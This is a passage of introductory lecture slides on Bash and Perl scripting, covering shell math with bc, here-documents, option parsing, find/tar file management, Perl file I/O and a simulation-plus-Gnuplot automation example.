    echo "Hello, World! sin($r)=$s"  
    



    Comments

    The first line specifies the interpreter of the script (here /bin/sh, could also have used /bin/bash)
    The command-line variables are available as the script variables
    $1  $2  $3  $4 and so on
    
    Variables are initialized as
    r=$1
    
    while the value of r requires a dollar prefix:
    my_new_variable=$r  # copy r to my_new_variable
    



    Bash and math

    Bourne shell and Bash have very little built-in math, we therefore need to use bc, Perl or Awk to do the math
    s=`echo "s($r)" | bc -l`
    s=`perl -e '$s=sin($ARGV[0]); print $s;' $r`
    s=`awk "BEGIN { s=sin($r); print s;}"`
    # or shorter:
    s=`awk "BEGIN {print sin($r)}"`
    
    Back quotes means executing the command inside the quotes and assigning the output to the variable on the left-hand-side
    some_variable=`some Unix command`
    
    # alternative notation:
    some_variable=$(some Unix command)
    



    The bc program

    bc = interactive calculator
    Documentation: man bc
    bc -l means bc with math library
    Note: sin is s, cos is c, exp is e
    echo sends a text to be interpreted by bc and bc responds with output (which we assign to s)
    variable=`echo "math expression" | bc -l`
    



    Printing

    The echo command is used for writing:
    echo "Hello, World! sin($r)=$s"
    
    and variables can be inserted in the text string
    (variable interpolation)
    Bash also has a printf function for format control:
    printf "Hello, World! sin(%g)=%12.5e\n" $r $s
    
    cat is usually used for printing multi-line text
    (see next slide)



    Convenient debugging tool: -x

    Each source code line is printed prior to its execution of you -x as option to /bin/sh or /bin/bash
    Either in the header
    #!/bin/sh -x
    
    or on the command line:
    unix> /bin/sh -x hw.sh
    unix> sh -x hw.sh
    unix> bash -x hw.sh
    
    Very convenient during debugging



    File reading and writing

    Bourne shell and Bash are not much used for file reading and manipulation; usually one calls up Sed, Awk, Perl or Python to do file manipulation
    File writing is efficiently done by 'here documents':
    cat > myfile <<EOF
    multi-line text
    can now be inserted here,
    and variable interpolation
    a la $myvariable is
    supported. The final EOF must
    start in column 1 of the 
    script file.
    EOF
    



    Simulation and visualization script

    Typical application in numerical simulation:

    run a simulation program
    run a visualization program and produce graphs
    Programs are supposed to run in batch
    Putting the two commands in a file, with some glue, makes a classical Unix script



    Setting default parameters

    #!/bin/sh
    
    pi=3.14159
    m=1.0; b=0.7; c=5.0; func="y"; A=5.0; 
    w=`echo 2*$pi | bc`
    y0=0.2; tstop=30.0; dt=0.05; case="tmp1"
    screenplot=1
    



    Parsing command-line options

    # read variables from the command line, one by one:
    while [ $# -gt 0 ]  # $# = no of command-line args.
    do
        option = $1; # load command-line arg into option
        shift;       # eat currently first command-line arg
        case "$option" in
    	-m)
    	    m=$1; shift; ;;  # load next command-line arg
    	-b)
    	    b=$1; shift; ;;
            ...
    	*)
    	    echo "$0: invalid option \"$option\""; exit ;;
        esac
    done
    



    Alternative to case: if

    case is standard when parsing command-line arguments in Bash, but if-tests can also be used. Consider
        case "$option" in
    	-m)
    	    m=$1; shift; ;;  # load next command-line arg
    	-b)
    	    b=$1; shift; ;;
    	*)
    	    echo "$0: invalid option \"$option\""; exit ;;
        esac
    
    versus
        if [ "$option" == "-m" ]; then
            m=$1; shift;  # load next command-line arg
        elif [ "$option" == "-b" ]; then
            b=$1; shift;
        else  
            echo "$0: invalid option \"$option\""; exit
        fi
    



    Creating a subdirectory

    dir=$case
    # check if $dir is a directory:
    if [ -d $dir ]
      # yes, it is; remove this directory tree
      then
        rm -r $dir
    fi
    mkdir $dir   # create new directory $dir
    cd $dir      # move to $dir
    
    # the 'then' statement can also appear on the 1st line:
    if [ -d $dir ]; then
      rm -r $dir
    fi
    
    # another form of if-tests:
    if test -d $dir; then
      rm -r $dir
    fi
    
    # and a shortcut:
    [ -d $dir ] && rm -r $dir
    test -d $dir && rm -r $dir
    



    Writing an input file

    'Here document' for multi-line output:
    # write to $case.i the lines that appear between
    # the EOF symbols:
    
    cat > $case.i <<EOF
            $m
            $b
            $c
            $func
            $A
            $w
            $y0
            $tstop
            $dt
    EOF
    



    Running the simulation

    Stand-alone programs can be run by just typing the name of the program
    If the program reads data from standard input, we can put the input in a file and redirect input:
    oscillator < $case.i
    
    Can check for successful execution:
    # the shell variable $? is 0 if last command
    # was successful, otherwise $? != 0
    
    if [ "$?" != "0" ]; then
      echo "running oscillator failed"; exit 1
    fi
    
    # exit n sets $? to n
    



    Remark (1)

    Variables can in Bash be integers, strings or arrays
    For safety, declare the type of a variable if it is not a string:
    declare -i i   # i is an integer
    declare -a A   # A is an array
    



    Remark (2)

    Comparison of two integers use a syntax different comparison of two strings:
    if [ $i -lt 10 ]; then        # integer comparison
    if [ "$name" == "10" ]; then  # string  comparison
    
    Unless you have declared a variable to be an integer, assume that all variables are strings and use double quotes (strings) when comparing variables in an if test
    if [ "$?" != "0" ]; then  # this is safe
    if [  $?  !=  0  ]; then  # might be unsafe
    



    Making plots

    Make Gnuplot script:
    echo "set title '$case: m=$m ...'" > $case.gnuplot
    ...
    # contiune writing with a here document:
    cat >> $case.gnuplot <<EOF
    set size ratio 0.3 1.5, 1.0;  
    ...
    plot 'sim.dat' title 'y(t)' with lines;
    ...
    EOF
    
    Run Gnuplot:
    gnuplot -geometry 800x200 -persist $case.gnuplot
    if [ "$?" != "0" ]; then
      echo "running gnuplot failed"; exit 1
    fi
    



    Some common tasks in Bash

    file writing
    for-loops
    running an application
    pipes
    writing functions
    file globbing, testing file types
    copying and renaming files, creating and moving to directories, creating directory paths, removing files and directories
    directory tree traversal
    packing directory trees



    File writing

    outfilename="myprog2.cpp"
    
    # append multi-line text (here document):
    cat >> $filename <<EOF
    /*
      This file, "$outfilename", is a version
      of "$infilename" where each line is numbered.
    */
    EOF
    
    # other applications of cat:
    cat myfile             # write myfile to the screen
    cat myfile >  yourfile # write myfile to yourfile
    cat myfile >> yourfile # append myfile to yourfile
    cat myfile | wc        # send myfile as input to wc
    



    For-loops

    The for element in list construction:
    files=`/bin/ls *.tmp`
    # we use /bin/ls in case ls is aliased
    
    for file in $files
    do
      echo removing $file
      rm -f $file
    done
    
    Traverse command-line arguments:
    for arg; do
      # do something with $arg
    done
    
    # or full syntax; command-line args are stored in $@
    for arg in $@; do
      # do something with $arg
    done
    



    Counters

    Declare an integer counter:
    declare -i counter
    counter=0
    # arithmetic expressions must appear inside (( ))
    ((counter++))
    echo $counter  # yields 1
    
    For-loop with counter:
    declare -i n; n=1
    for arg in $@; do
      echo "command-line argument no. $n is <$arg>"
      ((n++))
    done
    



    C-style for-loops

    declare -i i
    for ((i=0; i<$n; i++)); do 
      echo $c
    done
    



    Example: bundle files

    Pack a series of files into one file
    Executing this single file as a Bash script packs out all the individual files again (!)
    Usage:
    bundle file1 file2 file3 > onefile  # pack
    bash onefile # unpack
    
    Writing bundle is easy:
    #/bin/sh
    for i in $@; do
        echo "echo unpacking file $i"
        echo "cat > $i <<EOF"
        cat $i
        echo "EOF"
    done
    



    The bundle output file

    Consider 2 fake files; file1
    Hello, World!
    No sine computations today
    
    and file2
    1.0 2.0 4.0
    0.1 0.2 0.4
    
    Running bundle file1 file2 yields the output
    echo unpacking file file1
    cat > file1 <<EOF
    Hello, World!
    No sine computations today
    EOF
    echo unpacking file file2
    cat > file2 <<EOF
    1.0 2.0 4.0
    0.1 0.2 0.4
    EOF
    



    Running an application

    Running in the foreground:
    cmd="myprog -c file.1 -p -f -q";
    $cmd < my_input_file
    
    # output is directed to the file res
    $cmd < my_input_file > res
    
    # process res file by Sed, Awk, Perl or Python
    
    Running in the background:
    myprog -c file.1 -p -f -q < my_input_file &
    
    or stop a foreground job with Ctrl-Z and then type bg



    Pipes

    Output from one command can be sent as input to another command via a pipe
    # send files with size to sort -rn
    # (reverse numerical sort) to get a list 
    # of files sorted after their sizes:
    
    /bin/ls -s | sort -r
    
    
    cat $case.i | oscillator
    # is the same as
    oscillator < $case.i
    
    Make a new application: sort all files in a directory tree root, with the largest files appearing first, and equip the output with paging functionality:
    du -a root | sort -rn | less
    



    Numerical expressions

    Numerical expressions can be evaluated using bc:
    echo "s(1.2)" | bc -l  # the sine of 1.2
    # -l loads the math library for bc
    
    echo "e(1.2) + c(0)" | bc -l  # exp(1.2)+cos(0)
    
    # assignment:
    s=`echo "s($r)" | bc -l`
    
    # or using Perl:
    s=`perl -e "print sin($r)"`
    



    Functions

    # compute x^5*exp(-x) if x>0, else 0 :
    
    function calc() { 
       echo " 
       if ( $1 >= 0.0 ) {
          ($1)^5*e(-($1))
       } else {
          0.0
       } " | bc -l
    }
    
    # function arguments: $1 $2 $3 and so on
    # return value: last statement
    
    # call:
    r=4.2
    s=`calc $r`
    



    Another function example

    #!/bin/bash
    
    function statistics {
      avg=0; n=0
      for i in $@; do
        avg=`echo $avg + $i | bc -l`
        n=`echo $n + 1 | bc -l`
      done
      avg=`echo $avg/$n | bc -l`
    
      max=$1; min=$1; shift;
      for i in $@; do
        if [ `echo "$i < $min" | bc -l` != 0 ]; then
          min=$i; fi
        if [ `echo "$i > $max" | bc -l` != 0 ]; then
          max=$i; fi
      done
      printf "%.3f %g %g\n" $avg $min $max
    }
    



    Calling the function

    statistics 1.2 6 -998.1 1 0.1
    
    # statistics returns a list of numbers
    res=`statistics 1.2 6 -998.1 1 0.1`
    
    for r in $res; do echo "result=$r"; done
    
    echo "average, min and max = $res"
    



    File globbing

  • List all .ps and .gif files using wildcard notation:
    files=`ls *.ps *.gif`
    
    # or safer, if you have aliased ls:
    files=`/bin/ls *.ps *.gif`
    
    # compress and move the files:
    gzip $files
    for file in $files; do
      mv ${file}.gz $HOME/images
    



    Testing file types

    if [ -f $myfile ]; then
        echo "$myfile is a plain file"
    fi
    
    # or equivalently:
    if test -f $myfile; then
        echo "$myfile is a plain file"
    fi
    
    if [ ! -d $myfile ]; then
        echo "$myfile is NOT a directory"
    fi
    
    if [ -x $myfile ]; then
        echo "$myfile is executable"
    fi
    
    [ -z $myfile ] && echo "empty file $myfile"
    



    Rename, copy and remove files

    # rename $myfile to tmp.1:
    mv $myfile tmp.1
    
    # force renaming:
    mv -f $myfile tmp.1
    
    # move a directory tree my tree to $root:
    mv mytree $root
    
    # copy myfile to $tmpfile:
    cp myfile $tmpfile
    
    # copy a directory tree mytree recursively to $root:
    cp -r mytree $root
    
    # remove myfile and all files with suffix .ps:
    rm myfile *.ps
    
    # remove a non-empty directory tmp/mydir:
    rm -r tmp/mydir
    



    Directory management

    # make directory:
    $dir = "mynewdir";
    mkdir $mynewdir
    mkdir -m 0755 $dir  # readable for all
    mkdir -m 0700 $dir  # readable for owner only
    mkdir -m 0777 $dir  # all rights for all
    
    # move to $dir
    cd $dir
    # move to $HOME
    cd
    
    # create intermediate directories (the whole path):
    mkdirhier $HOME/bash/prosjects/test1
    # or with GNU mkdir:
    mkdir -p  $HOME/bash/prosjects/test1
    



    The find command

    Very useful command!

    find visits all files in a directory tree and can execute one or more commands for every file
    Basic example: find the oscillator codes
    find $scripting/src -name 'oscillator*' -print
    
    Or find all PostScript files
    find $HOME \( -name '*.ps' -o -name '*.eps' \) -print
    
    We can also run a command for each file:
    find rootdir -name filenamespec -exec command {} \; -print
    # {} is the current filename
    



    Applications of find (1)

    Find all files larger than 2000 blocks a 512 bytes (=1Mb):
    find $HOME -name '*' -type f -size +2000 -exec ls -s {} \;
    
    Remove all these files:
    find $HOME -name '*' -type f -size +2000 \
         -exec ls -s {} \; -exec rm -f {} \;
    
    or ask the user for permission to remove:
    find $HOME -name '*' -type f -size +2000 \
         -exec ls -s {} \; -ok rm -f {} \;
    



    Applications of find (2)

    Find all files not being accessed for the last 90 days:
    find $HOME -name '*' -atime +90 -print
    
    and move these to /tmp/trash:
    find $HOME -name '*' -atime +90 -print \
         -exec mv -f {} /tmp/trash \;
    
    Note: this one does seemingly nothing...
    find ~hpl/projects -name '*.tex'
    
    because it lacks the -print option for printing the name of all *.tex files (common mistake)



    Tar and gzip

    The tar command can pack single files or all files in a directory tree into one file, which can be unpacked later
    tar -cvf myfiles.tar mytree file1 file2
    
    # options:
    # c: pack, v: list name of files, f: pack into file
    
    # unpack the mytree tree and the files file1 and file2:
    tar -xvf myfiles.tar
    
    # options:
    # x: extract (unpack)
    
    The tarfile can be compressed:
    gzip mytar.tar
    
    # result: mytar.tar.gz
    



    Two find/tar/gzip examples

    Pack all PostScript figures:
    tar -cvf ps.tar `find $HOME -name '*.ps' -print`
    gzip ps.tar
    
    Pack a directory but remove CVS directories and redundant files
    # take a copy of the original directory:
    cp -r myhacks /tmp/oblig1-hpl
    # remove CVS directories
    find /tmp/oblig1-hpl -name CVS -print -exec rm -rf {} \;
    # remove redundant files:
    find /tmp/oblig1-hpl \( -name '*~' -o -name '*.bak' \
     -o -name '*.log' \) -print -exec rm -f {} \;
    # pack files:
    tar -cf oblig1-hpl.tar /tmp/tar/oblig1-hpl.tar
    gzip oblig1-hpl.tar
    # send oblig1-hpl.tar.gz as mail attachment
    





    Intro to Perl programming




    Required software

    For the Perl part of this course you will need

    Perl in a recent version (5.8)
    the following packages: Bundle::libnet, Tk, LWP::Simple, CGI::Debug, CGI::QuickForm



    Scientific Hello World script

    We start with writing "Hello, World!" and computing the sine of a number given on the command line
    The script (hw.pl) should be run like this:
    perl hw.pl 3.4
    
    or just (Unix)
    ./hw.pl 3.4
    
    Output:
    Hello, World! sin(3.4)=-0.255541102027
    



    Purpose of this script

    Demonstrate

    how to read a command-line argument
    how to call a math (sine) function
    how to work with variables
    how to print text and numbers



    The code

    File hw.pl:
    #!/usr/bin/perl
    
    # fetch the first (0) command-line argument:
    $r = $ARGV[0];  
    
    # compute sin(r) and store in variable $s:
    $s = sin($r);   
    
    # print to standard output:
    print "Hello, World! sin($r)=$s\n"; 
    



    Comments (1)

    The first line specifies the interpreter of the script (here /usr/bin/perl)
    perl hw.py 1.4   # first line: just a comment
    ./hw.py 1.4      # first line: interpreter spec.
    
    Scalar variables in Perl start with a dollar sign
    Each statement must end with a semicolon
    The command-line arguments are stored in an array ARGV
    $r = $ARGV[0];  # get the first command-line argument
    



    Comments (1)

    Strings are automatically converted to numbers if necessary
    $s = sin($r)
    
    (recall Python's need to convert r to float)
    Perl supports variable interpolation
    (variables are inserted directly into the string):
    print "Hello, World! sin($r)=$s\n";
    
    or we can control the format using printf:
    printf "Hello, World! sin(%g)=%12.5e\n", $r, $s;
    
    (printf in Perl works like printf in C)



    Note about strings in Perl

    Only double-quoted strings work with variable interpolation:
    print "Hello, World! sin($r)=$s\n";
    
    Single-quoted strings do not recognize Perl variables:
    print 'Hello, World! sin($r)=$s\n';
    
    yields the output
    Hello, World! sin($r)=$s
    
    Single- and double-quoted strings can span several lines (a la triple-quoted strings in Python)



    Where to find complete Perl info?

    Use perldoc to read Perl man pages:
    perldoc perl       # overview of all Perl man pages
    perldoc perlsub    # read about subroutines
    perldoc Cwd        # look up a special module, here 'Cwd'
    perldoc -f printf  # look up a special function, here 'printf'
    perldoc -q cgi     # seach the FAQ for the text 'cgi'
    
    Become familiar with the man pages
    Does Perl have a function for ...? Check perlfunc
    Very useful Web site: www.perldoc.com
    Alternative: The 'Camel book'
    (much of the man pages are taken from that book)
    Many textbooks have more accessible info about Perl



    Reading/writing data files

    Tasks:

    Read (x,y) data from a two-column file
    Transform y values to f(y)
    Write (x,f(y)) to a new file
    What to learn:

    File opening, reading, writing, closing
    How to write and call a function
    How to work with arrays
    File: src/perl/datatrans1.pl



    Reading input/output filenames

    Read two command-line arguments: input and output filenames
    ($infilename, $outfilename) = @ARGV;
    
    variable by variable in the list on the left is set equal to the @ARGV array
    Could also write
    $infilename  = $ARGV[0];
    $outfilename = $ARGV[1];
    
    but this is less perl-ish



    Error handling

    What if the user fails to provide two command-line arguments?
    die "Usage: $0 infilename outfilename" if $#ARGV < 1;
    
    # $#ARGV is the largest valid index in @ARGV,
    # the length of @ARGV is then $#ARGV+1 (first index is 0)
    
    die terminates the program
    (with exit status different from 0)



    Open file and read line by line

    Open files:
    open(INFILE,  "<$infilename");   # open for reading
    open(OUTFILE, ">$outfilename");  # open for writing
    
    open(APPFILE, ">>$outfilename"); # open for appending
    
    Read line by line:
    while (defined($line=<INFILE>)) {
        # process $line
    }
    



    Defining a function

    sub myfunc {
    
        my ($y) = @_;
    
        # all arguments to the function are stored
        # in the array @_
        # the my keyword defines local variables
    
        # more general example on extracting arguments:
        # my ($arg1, $arg2, $arg3) = @_;
    
        if ($y >= 0.0) { 
            return $y**5.0*exp(-$y); 
        }
        else { 
            return 0.0; 
        }
    }
    
    Functions can be put anywhere in a file



    Data transformation loop

    Input file format: two columns of numbers
    0.1   1.4397
    0.2   4.325
    0.5   9.0
    
    Read (x,y), transform y, write (x,f(y)):
    while (defined($line=<INFILE>)) {
        ($x,$y) = split(' ', $line); # extract x and y value
        $fy = myfunc($y);  # transform y value
        printf(OUTFILE "%g  %12.5e\n", $x, $fy);
    }
    
    Close files:
    close(INFILE); close(OUTFILE);
    



    Unsuccessful file opening

    The script runs without error messages if the file does not exist (recall that Python by default issues error messages in case of non-existing files)
    In Perl we should test explicitly for successful operations and issue error messages
    open(INFILE,  "<$infilename") 
        or die "unsuccessful opening of $infilename; $!\n";
    
    # $! is a variable containing the error message from
    # the operating system ('No such file or directory' here)
    



    The code (1)

    : # *-*-perl-*-*
      eval 'exec perl -w -S  $0 ${1+"$@"}' 
        if 0;  # if running under some shell
    
    die "Usage: $0 infilename outfilename\n" if $#ARGV < 1;
    
    ($infilename, $outfilename) = @ARGV;
    
    open(INFILE,  "<$infilename") or die "$!\n";
    open(OUTFILE, ">$outfilename") or die "$!\n";
    
    sub myfunc {
        my ($y) = @_;
        if ($y >= 0.0) { return $y**5.0*exp(-$y); }
        else           { return 0.0; }
    }
    



    Comments

    Perl has a flexible syntax:
    if ($#ARGV < 1) {
        die "Usage: $0 infilename outfilename\n";
    }
    
    die "Usage: $0 infilename outfilename\n" if $#ARGV < 1;
    
    Parenthesis can be left out from function calls:
    open INFILE, "<$infilename";  # open for reading
    
    Functions (subroutines) extract arguments from the list @_
    Subroutine variables are global by default; the my prefix make them local



    The code (2)

    # read one line at a time:
    while (defined($line=<INFILE>)) {
        ($x, $y) = split(' ', $line); # extract x and y value
        $fy = myfunc($y);  # transform y value
        printf(OUTFILE "%g  %12.5e\n", $x, $fy);
    }
    close(INFILE); close(OUTFILE);
    



    Loading data into arrays

    Read input file into list of lines:
    @lines = <INFILE>;
    
    Store x and y data in arrays:
    # go through each line and split line into x and y columns
    @x = (); @y = ();   # store data pairs in two arrays x and y
    for $line (@lines) {
        ($xval, $yval) = split(' ', $line);
        push(@x, $xval);  push(@y, $yval);
    }
    



    Array loop

    For-loop in Perl:
    for ($i = 0; $i <= $last_index; $i++) { ... }
    
    Loop over (x,y) values:
    open(OUTFILE, ">$outfilename")
        or die "unsuccessful opening of $outfilename; $!\n";
    
    for ($i = 0; $i <= $#x; $i++) {
        $fy = myfunc($y[$i]);  # transform y value
        printf(OUTFILE "%g  %12.5e\n", $x[$i], $fy);
    }
    close(OUTFILE);
    
    File: src/perl/datatrans2.pl



    Terminology: array vs list

    Perl distinguishes between array and list
    Short story: array is the variable, and it can have a list or its length as values, depending on the context
    @myarr    =   (1, 99, 3, 6);
    # array            list
    
    List context: the value of @myarr is a list
    @q = @myarr;  # array q gets the same entries as @myarr
    
    Scalar context: the value of @myarr is its length
    $q = @myarr;  # q becomes the no of elements in @myarr
    



    Convenient use of arrays in a scalar context

    Can use the array as loop limit:
    for ($i = 0; $i < @x; $i++) {
        # work with $x[$i] ...
    }
    
    Can test on @ARGV for the number of command-line arguments:
    die "Usage: $0 infilename outfilename" unless @ARGV >= 2;
    # instead of
    die "Usage: $0 infilename outfilename" if $#ARGV < 1;
    



    Running a script

    Method 1: write just the name of the scriptfile:
    ./datatrans1.pl infile outfile
    
    or
    datatrans1.pl infile outfile
    
    if . (current working directory) or the directory containing datatrans1.pl is in the path
    Method 2: run an interpreter explicitly:
    perl datatrans1.pl infile outfile
    
    Use the first perl program found in the path
    On Windows machines one must use method 2



    About headers (1)

    In method 1, the first line specifies the interpreter
    Explicit path to the interpreter:
    #!/usr/local/bin/perl
    #!/usr/home/hpl/scripting/Linux/bin/perl
    
    Using env to find the first Perl interpreter in the path
    #!/usr/bin/env perl
    
    is not a good idea because it does not always work with
    #!/usr/bin/env perl -w
    
    i.e. Perl with warnings (ok on SunOS, not on Linux)



    About headers (2)

    Using Bourne shell to find the first Perl interpreter in the path:
    : # *-*-perl-*-*
      eval 'exec perl -w -S  $0 ${1+"$@"}' 
        if 0;  # if running under some shell
    
    Run src/perl/headerfun.sh for in-depth explanation
    The latter header makes it easy to move scripts from one machine to another
    Nevertheless, sometimes you need to ensure that all users applies a specific Perl interpreter



    Simulation example

    Code: oscillator (written in Fortran 77)



    Usage of the simulation code

    Input: m, b, c, and so on read from standard input
    How to run the code:
    oscillator < file
    
    where file can be
    3.0
    0.04
    1.0
    ...
    
    Results (t, y(t)) in a file sim.dat



    A plot of the solution



    Plotting graphs in Gnuplot

    Commands:
    set title 'case: m=3 b=0.7 c=1 f(y)=y A=5 ...';
    
    # screen plot: (x,y) data are in the file sim.dat
    plot 'sim.dat' title 'y(t)' with lines;
    
    # hardcopies:
    set size ratio 0.3 1.5, 1.0;  
    set term postscript eps mono dashed 'Times-Roman' 28;
    set output 'case.ps';
    plot 'sim.dat' title 'y(t)' with lines;
    
    # make a plot in PNG format as well:
    set term png small;
    set output 'case.png';
    plot 'sim.dat' title 'y(t)' with lines;
    
    Commands can be given interactively or put in file



    Typical manual work

    Change oscillating system parameters by editing the simulator input file
    Run simulator:
    oscillator < inputfile
    
    Plot:
    gnuplot -persist -geometry 800x200 case.gp
    
    (case.gp contains Gnuplot commands)
    Plot annotations must be consistent with inputfile
    Let's automate!



    Deciding on the script's interface

    Usage:
    ./simviz1.pl -m 3.2 -b 0.9 -dt 0.01 -case run1
    
    Sensible default values for all options
    Put simulation and plot files in a subdirectory (specified by -case run1)
    File: src/perl/simviz1.pl



    The script's task

    Set default values of m, b, c etc.
    Parse command-line options (-m, -b etc.) and assign new values to m, b, c etc.
    Create and move to subdirectory
    Write input file for the simulator
    Run simulator
    Write Gnuplot commands in a file
    Run Gnuplot



    Parsing command-line options

    Set default values of the script's input parameters:
    $m = 1.0; $b = 0.7; $c = 5.0; $func = "y"; $A = 5.0; 
    $w = 2*3.14159; $y0 = 0.2; $tstop = 30.0; $dt = 0.05; 
    $case = "tmp1";  $screenplot = 1;
    
    Examine command-line options:
    # read variables from the command line, one by one:
    while (@ARGV) {
        $option = shift @ARGV;   # load cmd-line arg into $option
        if ($option eq "-m") { 
    	$m = shift @ARGV;    # load next command-line arg
        }
        elsif ($option eq "-b")  { $b = shift @ARGV; }
        ...
    }
    
    shift 'eats' (extracts and removes) the first array element



    Alternative parsing: GetOptions

    Perl has a special function for parsing command-line arguments:
    use Getopt::Long;   # load module with GetOptions function
    GetOptions("m=f" => \$m, "b=f" => \$b, "c=f" => \$c,
               "func=s" => \$func, "A=f" => \$A, "w=f" => \$w,
               "y0=f" => \$y0, "tstop=f" => \$tstop,
               "dt=f" => \$dt, "case=f" => \$case,
               "screenplot!" => \$screenplot);
    # explanations:
    "m=f" => \$m     
    # command-line option --m or -m requires a float (f) 
    # variable, e.g., -m 5.1 sets $m to 5.1
    
    "func=s" => \$func
    #  --func string (result in $func)
    
    "screenplot!" => \$screenplot
    # --screenplot turns $screenplot on,
    # --noscreenplot turns $screenplot off
    



    Creating a subdirectory

    Perl has a rich cross-platform operating system interface
    Safe, cross-platform creation of a subdirectory:
    $dir = $case;
    use File::Path;    # contains the rmtree function
    if (-d $dir) {     # does $dir exist?
        rmtree($dir);  # remove directory
        print "deleting directory $dir\n";
    }
    mkdir($dir, 0755) 
          or die "Could not create $dir; $!\n"; 
    chdir($dir)       
          or die "Could not move to $dir; $!\n";
    



    Writing the input file to the simulator

    open(F,">$case.i") or die "open error; $!\n";
    print F "
            $m
            $b
            $c
            $func
            $A
            $w
            $y0
            $tstop
            $dt
    ";
    close(F);
    
    Double-quoted strings can be used for multi-line output



    Running the simulation

    Stand-alone programs can be run as
    system "$cmd";  # $cmd is the command to be run
    
    # examples:
    system "myprog < input_file";
    system "ls *.ps";  # valid, but bad - Unix-specific
    
    Safe execution of our simulator:
    $cmd = "oscillator < $case.i";
    $failure = system($cmd);
    die "running the oscillator code failed\n" if $failure;
    



    Making plots

    Make Gnuplot script:
    open(F, ">$case.gnuplot");
    # print multiple lines using a "here document"
    print F <<EOF; 
    set title '$case: m=$m b=$b c=$c f(y)=$func ...';
    ...
    EOF
    close(F);
    
    Run Gnuplot:
    $cmd = "gnuplot -geometry 800x200 -persist $case.gnuplot";
    $failure = system($cmd);
    die "running gnuplot failed\n" if $failure;
    



    Multi-line output in Perl

    Double-quoted strings:
    print "\
    Here is some multi-line text
    with a variable $myvar inserted.
    Newlines are preserved.
    "
    
    'Here document':
    print FILE <<EOF
    Here is some multi-line text
    with a variable $myvar inserted.
    Newlines are preserved.
    EOF
    
    Note: final EOF must start in 1st column!



    About Perl syntax

    All Perl functions can be used without parenthesis in calls:
    open(F, "<$somefile\");   # with parenthesis
    open F, "<$somefile\";    # without parenthesis
    
    More examples:
    printf F "%5d: %g\n", $i, $result;
    system "./myapp -f 0";
    
    If-like tests can proceed the action:
    printf F "%5d: %g\n", $i, $result unless $counter > 0;
    
    # equivalent C-like syntax:
    if (!$counter > 0) {
        printf(F "%5d: %g\n", $i, $result);
    }
    
    This Perl syntax makes scripts easier to read



    TIMTOWTDI

    = There Is More Than One Way To Do It
    TIMTOWTDI is a Perl philosophy
    These notes: emphasis on one verbose (easy-to-read) way to do it
    Nevertheless, you need to know several Perl programming styles to understand other people's codes!
    Example of TIMTOWTDI: a Perl grep program



    The grep utility on Unix

    Suppose you want to find all lines in a C file containing the string superLibFunc
    Unix grep is handy for this purpose:
    grep superLibFunc myfile.c
    
    prints the lines containing superLibFunc
    Can also search for text patterns (regular expressions)



    TIMTOWTDI: Perl grep

    Experienced Perl programmer:
    $string = shift;
    while (<>) { print if /$string/o; }
    
    Lazy Perl user:
    perl -n -e 'print if /superLibFunc/;' file1 file2 file3
    
    Eh, Perl has a grep command...
    $string = shift; 
    print grep /$string/, <>;
    
    Confused? Next slide is for the novice



    Perl grep for the novice

    #!/usr/bin/perl
    die "Usage: $0 string file1 file2 ...\n" if $#ARGV < 1;
    
    # first command-line argument is the string to search for:
    $string = shift @ARGV;  # = $ARGV[0];
    
    # run through the next command-line arguments,
    # i.e. run through all files, load the file and grep:
    
    while (@ARGV) {
        $file = shift @ARGV;
        if (-f $file) {
            open(FILE,"<$file");
            @lines = <FILE>;  # read all lines into a list
    
            foreach $line (@lines) {
                # check if $line contains the string $string:
                if ($line =~ /$string/) {  # regex match?
                    print "$file: $line";
                }
            }
        }
    }
    



    Dollar underscore

    Lazy Perl programmers make use of the implicit underscore variable:
    foreach (@files) {
        if (-f) {
            open(FILE,"<$_");
            foreach (<FILE>) {
                if (/$string/) {
                    print;
                }}}}
    
    The fully equivalent code is
    foreach $_(@files) {
        if (-f $_) {
            open(FILE,"<$_");
            foreach $_(<FILE>) {
                if ($_ =~ /$string/) {
                    print $_;
                }}}}
    



    More modern Perl style

    With use of dollar underscore:
    die "Usage: $0 pattern file1 file2 ...\n" unless @ARGV >= 2;
    ($string, @files) = @ARGV;
    foreach (@files) {
        next unless -f; # jump to next loop pass
        open FILE, $_;
        foreach (<FILE>) { print if /$string/; }
    }
    
    Without dollar underscore:
    die "Usage: $0 pattern file1 file2 ...\n" unless @ARGV >= 2;
    ($string, @files) = @ARGV;
    foreach $file (@files) {
        next unless -f $file;  
        open FILE, $file;
        foreach $line (<FILE>) { 
           print $line if $line =~ /$string/;
        }}